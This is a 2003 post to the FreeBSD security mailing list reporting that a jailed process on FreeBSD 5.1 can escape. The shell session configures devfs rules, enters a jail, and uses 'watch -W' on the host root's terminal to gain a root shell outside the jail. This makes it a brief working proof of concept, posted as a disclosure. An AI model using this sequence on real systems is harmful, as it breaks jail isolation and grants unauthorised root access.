jail + devfs + snp problem (FreeBSD 5.1-RELEASE-p10)
Adam Nowacki
ptnowak at bsk.vectranet.pl
Sun Oct 19 14:12:47 PDT 2003
shell# /sbin/devfs rule -s 2 delset
shell# /sbin/devfs rule -s 2 add hide
shell# /sbin/devfs rule -s 2 add path random unhide
shell# /sbin/devfs rule -s 2 add path urandom unhide
shell# /sbin/devfs rule -s 2 add path zero unhide
shell# /sbin/devfs rule -s 2 add path pty\* unhide
shell# /sbin/devfs rule -s 2 add path pty\* unhide
shell# /sbin/devfs rule -s 2 add path tty\* unhide
shell# /sbin/mount_devfs devfs /storage0/site/dev
shell# /sbin/devfs -m /storage0/site/dev ruleset 2
shell# cd /storage0/site/dev
shell# ls
fd ptyp6 ptypf ptypo ttyld0 ttyp7 ttypg ttypp ttyv6 ttyvf
net ptyp7 ptypg ptypp ttyld1 ttyp8 ttyph ttypq ttyv7 urandom
null ptyp8 ptyph ptypq ttyp0 ttyp9 ttypi ttypr ttyv8 zero
ptyp0 ptyp9 ptypi ptypr ttyp1 ttypa ttypj ttyv0 ttyv9
ptyp1 ptypa ptypj random ttyp2 ttypb ttypk ttyv1 ttyva
ptyp2 ptypb ptypk ttyd0 ttyp3 ttypc ttypl ttyv2 ttyvb
ptyp3 ptypc ptypl ttyd1 ttyp4 ttypd ttypm ttyv3 ttyvc
ptyp4 ptypd ptypm ttyid0 ttyp5 ttype ttypn ttyv4 ttyvd
ptyp5 ptype ptypn ttyid1 ttyp6 ttypf ttypo ttyv5 ttyve
Everything looks great, but:
shell# w -n
USER TTY FROM LOGIN@ IDLE WHAT
root pm ??? ??? - w -n
shell# jexec 1 /bin/sh
# cd /dev
# ls -al snp*
ls: snp*: No such file or directory
# watch -W pm
shell# id
uid=0(root) gid=0(wheel) groups=0(wheel), 5(operator)
And I'm outside !
More information about the freebsd-security
mailing list